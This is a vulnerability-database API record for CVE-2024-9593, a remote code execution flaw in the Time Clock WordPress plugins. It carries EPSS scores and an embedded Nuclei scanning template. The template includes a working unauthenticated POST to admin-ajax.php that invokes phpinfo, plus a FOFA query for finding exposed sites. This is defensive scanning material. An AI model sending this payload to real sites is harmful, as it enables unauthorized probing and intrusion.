{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-9593/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-9593/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-9593/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-9593/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-9593/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-9593"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-9593"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.12411,
      "kev": false,
      "percentile": 0.96061
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2024/CVE-2024-9593.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2024-9593\n\ninfo:\n  name: Time Clock <= 1.2.2 & Time Clock Pro <= 1.1.4 - Remote Code Execution\n  author: s4e-io\n  severity: high\n  description: |\n    The Time Clock plugin and Time Clock Pro plugin for WordPress are vulnerable to Remote Code Execution in versions up to, and including, 1.2.2 (for Time Clock) and 1.1.4 (for Time Clock Pro) via the 'etimeclockwp_load_function_callback' function. This allows unauthenticated attackers to execute code on the server. The invoked function's parameters cannot be specified.\n  impact: |\n    Unauthenticated attackers can execute limited PHP functions on the server through the etimeclockwp_load_function_callback function, potentially exposing sensitive system information through phpinfo and other callable functions.\n  remediation: |\n    Update Time Clock plugin to a version later than 1.2.2 or Time Clock Pro plugin to a version later than 1.1.4 to address the remote code execution vulnerability.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/detail/time-clock-122-unauthenticated-limited-remote-code-execution\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-9593\n    - https://github.com/RandomRobbieBF/CVE-2024-9593\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L\n    cvss-score: 8.3\n    cve-id: CVE-2024-9593\n    cwe-id: CWE-94\n    epss-score: 0.12411\n    epss-percentile: 0.96061\n  metadata:\n    max-request: 2\n    verified: true\n    vendor: scott_paterson\n    product: time-clock & time-clock-pro\n    framework: wordpress\n    fofa-query: body=\"/wp-content/plugins/time-clock/\" || body=\"/wp-content/plugins/time-clock-pro/\"\n  tags: cve,cve2024,time-clock,wp,wordpress,wp-plugin,rce,time-clock-pro,vkev,vuln\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"/wp-content/plugins/time-clock\")'\n          - 'status_code == 200'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php?action=etimeclockwp_load_function HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        function=phpinfo\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"PHP Extension\"\n          - \"PHP Version\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        part: body\n        group: 1\n        regex:\n          - '>PHP Version <\\/td><td class=\"v\">([0-9.]+)'\n# digest: 4a0a004730450221009b7e7c9e46c5a095fb6e838b31653b7c80dbb101680afe180f9ccfa77273dd9e0220257af8f1eda246b3134a5f60f65686678f2536b52d4589321d3a50068294a0eb:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2024-9593"
}